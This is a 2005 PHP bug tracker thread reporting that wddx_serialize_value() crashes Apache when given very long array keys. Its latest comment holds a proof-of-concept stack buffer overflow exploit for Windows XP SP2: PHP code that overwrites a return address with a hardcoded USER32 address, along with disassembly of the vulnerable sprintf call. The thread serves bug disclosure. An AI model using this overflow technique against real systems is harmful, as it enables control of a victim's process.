#34306 [Opn]: wddx_serialize_value() crashes with long and weird array keys

Wed, 31 Aug 2005 03:24:40 -0700 

 ID:               34306
 User updated by:  dmitrysp at yandex dot ru
 Reported By:      dmitrysp at yandex dot ru
 Status:           Open
 Bug Type:         WDDX related
 Operating System: Windows XP sp2
 PHP Version:      5.1.0RC1
 New Comment:

What about you? Exploit example for Windows XP sp2:

$str='';
for ($i=1; $i<226; $i++) $str.=chr($i); // 251 or 256 > 230 bytes
$str.="\x49\x9B\xd7\x77"; // modify CALL return address from 
php_wddx_serialize_var()
$buf=wddx_serialize_value(array($str=>1), 'name');

77D79B49 - jump to Win API USER32.DisplayExitWindowsWarning function
(static address on some WinXP OS). Buffer overflow on sprintf(tmp_buf,
WDDX_VAR_S, name_esc) in wddx.c line 627.

101E089E            |. 50                 PUSH EAX
101E089F            |. 8D5424 38          LEA EDX,DWORD PTR
SS:[ESP+38]
101E08A3            |. 68 B8592B10        PUSH php5ts.102B59B8         
          ;  ASCII "<var name='%s'>"
101E08A8            |. 52                 PUSH EDX
101E08A9            |. 894424 38          MOV DWORD PTR
SS:[ESP+38],EAX
101E08AD            |. E8 FE4DEEFF        CALL php5ts.php_sprintf

This example "clean up" full stack to down:
$str='';
for ($i=1; $i<226; $i++) $str.=chr($i);
for ($i=1; $i<1000; $i++) $str.=chr(1);
$buf=wddx_serialize_value(array($str=>1), 'name');


Previous Comments:
------------------------------------------------------------------------

[2005-08-31 11:28:59] [EMAIL PROTECTED]

Correction: The max length is 251.

------------------------------------------------------------------------

[2005-08-31 11:27:10] [EMAIL PROTECTED]

Apparently the maximum array key lenght for wddx serializer is 254. It
doesn't matter what the content is.


------------------------------------------------------------------------

[2005-08-30 14:10:10] dmitrysp at yandex dot ru

Description:
------------
Apache2 crash. 

Try Apache2 + PHP 5.1.0RC1, 
Apache2 + PHP 5.1.0-dev (built: Aug 30 2005 08:42:21), 
php.exe 4.3.0 console.

szAppName : Apache.exe     szAppVer : 2.0.54.0     szModName :
php5ts.dll     
szModVer : 5.1.0.0     offset : 001e144d     

Reproduce code:
---------------
    $str='';
    for ($i=1; $i<255; $i++) $str.=chr($i);
    $mix=array($str=>1);
    $buf=wddx_serialize_value($mix, 'name'); // apache crash here
    echo "ok";




------------------------------------------------------------------------


-- 
Edit this bug report at http://bugs.php.net/?id=34306&edit=1

Reply via email to